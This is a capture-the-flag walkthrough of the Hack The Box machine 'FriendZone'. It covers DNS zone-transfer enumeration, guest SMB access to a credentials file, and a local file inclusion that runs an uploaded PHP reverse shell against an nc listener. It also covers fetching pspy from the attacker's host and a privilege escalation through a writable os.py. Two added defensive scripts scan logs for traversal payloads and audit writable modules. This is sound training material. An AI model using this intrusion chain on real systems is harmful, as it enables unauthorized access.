FriendZone is an "Easy" difficulty Machine on hackthebox.eu
First Step: Nmap Scan of the Machine
nmap -n -v -Pn -p- -A --reason -oN fz.txt 10.10.10.123
Ubuntu, with a few things worth looking at
Primary areas of opportunity: FTP/21, HTTP/80, SMB/445
Interesting port: TCP/53
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 63
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.29
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
10.10.10.123 friendzone.htb
Checking to see if we can find anything with DNS since the port is apparently open, but nslookup shows nothing
Time to check out something else.
Check the web browser first:
Nothing on the page worth mentioning, nothing in the source either.
Time to check HTTPS:
I checked the cert and found the CN was set to friendzone.red.
nslookup still didn't give me anything good, but I was able to use a DNS zone transfer to find multiple hostnames used by this box.
Added 3 new entries into my /etc/hosts file
10.10.10.123 administrator1.friendzone.red
10.10.10.123 hr.friendzone.red
10.10.10.123 uploads.friendzone.red
10.10.10.123 friendzone.red
DNS Entry 1) https://friendzone.red, was just a gif of a dude trying desperately to escape the friendzone.
I was able to enumerate and find /admin, but it was empty, so I think this is a dead end...
DNS Entry 2) https://administrator1.friendzone.red: I busted an image folder, but there was no access without logging in first.
We'll revisit https://administrator1.friendzone.red for sure.
DNS Entry 3) https://uploads.friendzone.red, an upload page! Here, I was thinking LFI for sure.
I uploaded an image to verify what a working upload looks like.
It says successful and returns what looks like an epoch timestamp.
No matter what I did, I wasn't able to determine where these uploads were ending up. So, perhaps useful, but I'll just keep it in mind for later.
DNS Entry 4) hr.friendzone.red does nothing; the definition of a dead end.
Time to see what other information we can find. Let's check SMB/445:
smbclient -L friendzone.htb
# Create a Directory for mapping the shares
mkdir sambas
# Access the folder
cd sambas
# Create 3 folders for their Network Mappings
mkdir Files
mkdir general
mkdir Development
# Attempt to mount all 3 folders at the same time using the guest credentials
mount //10.10.10.123/Files ~/sambas/Files -o username=guest,password=''
mount //10.10.10.123/general ~/sambas/general -o username=guest,password=''
mount //10.10.10.123/Development ~/sambas/Development -o username=guest,password=''
I was able to map 2 of the 3 shares using the guest login!
The two that accepted the connection are Development and general. In general we find a file named 'cred.txt' with some credentials in it.
Another nice thing about mounting the Samba shares this way, for me anyway, is that you can use the GUI and keep notes in an open notepad. Do what you prefer though!
/general folder
GUI:
CLI:
/Development folder
GUI:
CLI:
Let's try our login credentials on the administrator1.friendzone.red portal
URL:
https://administrator1.friendzone.red
Excellent, we're in, and it's leading us toward a dashboard!
The dashboard has even more instructions for us on how to use its URL encoding:
https://administrator1.friendzone.red/dashboard.php
So it brings up an image (a.jpg and b.jpg both work for image_id), and pagename=timestamp.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
Of course we have to check whether timestamp is a local PHP file, and that's exactly what it is. So this is where we'll hunt for our LFI:
https://administrator1.friendzone.red/timestamp.php
Now, this is where I got pissed trying to figure out where to look for the folders. Folks were rebooting the box like mad and sticking pagename=dashboard into the URL above, which I'm sure was killing the box (and which I'm also guilty of, see below)...
So I stepped away and came back after about 2 weeks.
This helped, as when I was reviewing my screenshots from my first dive in I noticed the smbclient screenshot had a comment labeling the "Files" share as '/etc/Files'.
If you remember we had no access to this folder, so this may be nothing, but I moved forward with the assumption that /etc/general and /etc/Development (maybe /etc/Dev) were the folder locations for those shares.
I created a simple PHP file with <?php echo 'hello world'; ?> inside to test, named it dbtn (saved as a .php file, since the dashboard appends the extension the same way it did for timestamp), and saved it in the /sambas/Development folder.
URL:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn
This script is consistently one of the best PHP reverse shells:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
I updated the IP and port in the reverse shell script, and uploaded it to the /sambas/Development folder.
Now we set the Kali box to listen on port 9595:
nc -v -n -l -p 9595
We then go back to our browser and kick off the remote shell:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn_shell
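From the defender's side, the dashboard.php requests above leave a very recognisable trail in the Apache access log. The following script is an added example, not part of this writeup or the box, that scans constructed log lines for pagename values which are not a bare, allowlisted page name; it assumes timestamp is the only page dashboard.php is meant to include.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample Apache access log lines, modelled on the requests in this writeup
SAMPLE_LOG = """\
10.10.14.5 - - [10/Mar/2019:12:00:01 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 512
10.10.14.5 - - [10/Mar/2019:12:00:07 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/dbtn HTTP/1.1" 200 23
10.10.14.5 - - [10/Mar/2019:12:00:09 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 40
10.10.14.5 - - [10/Mar/2019:12:00:10 +0000] "GET /dashboard.php?image_id=a.jpg&pagename=dashboard HTTP/1.1" 500 0
"""

# Assumption: timestamp is the only page dashboard.php is meant to include
ALLOWED_PAGES = {"timestamp"}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def classify_pagename(value):
    """Return why a (URL-decoded) pagename value is suspicious, or None if it is allowed."""
    if "\x00" in value:
        return "null byte"
    if ".." in value:
        return "traversal"
    if "/" in value or "\\" in value:
        return "path separator"
    if value not in ALLOWED_PAGES:
        return "not in allowlist"  # e.g. pagename=dashboard, which the writeup notes was killing the box
    return None


def scan_log(text):
    """Return (line_no, pagename, reason) for every dashboard.php request whose pagename fails the check."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/dashboard.php"):
            continue
        # parse_qs URL-decodes, so %2F becomes / before the check
        for val in parse_qs(parts.query, keep_blank_values=True).get("pagename", []):
            reason = classify_pagename(val)
            if reason:
                hits.append((n, val, reason))
    return hits


if __name__ == "__main__":
    for n, val, reason in scan_log(SAMPLE_LOG):
        print(f"line {n}: pagename={val!r} -> {reason}")
```

The same allowlist check, applied inside dashboard.php before the include, is also the fix for the bug.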
After hunting around for a LONG time I found a database username and password.
I was grepping "ps aux" to see what I could find for services.
I realize that because I spotted this I skipped a HUGE part of the process here, but I did work my way back after I got the root flag. That information will be at the bottom of this, and was great to learn!
I found multiple os.py files, which is worth noting.
I looked into the os.py file the user was editing and found the following command at the end of the file:
I wasn't sure where the root flag was specifically, so I grabbed 3 locations I thought it might be (knowing full well the Desktop and Root ones weren't even likely to exist).
Ok, so back to the piece I skipped... remember I spotted this guy editing the python file directly...
GitHub for the win!
I cloned the repo from GitHub:
git clone https://github.com/DominicBreuker/pspy
Started up my super basic web server:
systemctl start apache2
Copied pspy64 into my web folder, then pulled it down on the target:
wget http://10.10.x.x/pspy64
Ran into some permission issues:
./pspy64
Fixed permissions, and it started watching all running processes:
chmod 777 pspy64 && ./pspy64
The output screamed for a few seconds before calming down, but within 2-3 minutes I saw the following:
What I can't figure out is how they determined they needed to edit the 2.7 file as opposed to any of the 3 python3 folders...
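The root cause on this box is a library file on the interpreter's search path that a low-privileged user can edit while a root process imports it. The audit below is an added example, not part of this writeup or of pspy, that walks a search path and reports directories and named modules whose mode bits grant write to group or world; demo() builds a constructed fixture so it runs offline, and the default audit_module_paths(sys.path) call checks the interpreter running the script (feed it another interpreter's sys.path, such as python2.7's, to check that one).

```python
import os
import stat
import sys
import tempfile


def writable_by_others(path):
    """True if the mode bits grant write to group or world (mode-based, so the result does not depend on who runs the audit)."""
    return bool(os.lstat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_module_paths(search_path, modules=("os",)):
    """Report search-path directories, and the named modules inside them, that a non-owner could modify.

    search_path is a list like sys.path; for another interpreter pass the output of
    python2.7 -c "import sys; print(sys.path)".
    """
    findings = []
    for d in search_path:
        if not d or not os.path.isdir(d):
            continue  # skip the '' (cwd) entry and zip archives
        if writable_by_others(d):
            findings.append((d, "directory writable"))  # anyone could drop a new module here
        for mod in modules:
            p = os.path.join(d, mod + ".py")
            if os.path.isfile(p) and writable_by_others(p):
                findings.append((p, "module writable"))  # its code runs as whoever imports it
    return findings


def demo():
    """Constructed fixture: two fake search-path directories, one with a protected os.py and one with a world-writable os.py."""
    base = tempfile.mkdtemp(prefix="pyaudit_")
    safe, weak = os.path.join(base, "safe"), os.path.join(base, "weak")
    for d, mode in ((safe, 0o644), (weak, 0o666)):
        os.mkdir(d, 0o755)
        p = os.path.join(d, "os.py")
        with open(p, "w") as f:
            f.write("# placeholder module, not a real os.py\n")
        os.chmod(p, mode)
    return audit_module_paths([safe, weak])


if __name__ == "__main__":
    for path, why in demo():
        print(f"fixture  {why}: {path}")
    for path, why in audit_module_paths(sys.path):
        print(f"this interpreter  {why}: {path}")
```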
Dead Ends and Rabbit Holes
- https://friendzone.red
  - was just a gif of a dude trying desperately to escape the friendzone.
  - /admin went nowhere
- FTP
  - Never got in, and spent a while trying to identify any vulnerabilities to no avail.
- Wfuzz
  - I love wfuzz... but since this box used so much SSL I wasn't able to use it, and I blew a lot of time trying to figure out a way to fuzz even though it was HTTPS.
- https://uploads.friendzone.red
  - I assumed it was a broken script on the front end, so I wasted a lot of time trying to fix the input object names. In the end the script on the backend (upload.php) literally doesn't do anything with the file. It just checks if there is one, then tells you it was successful.
- https://administrator1.friendzone.red/dashboard.php
  - Finding the right folder to abuse the LFI. In the end the answer was simple... and if I'd spent time looking for clues it would have been faster.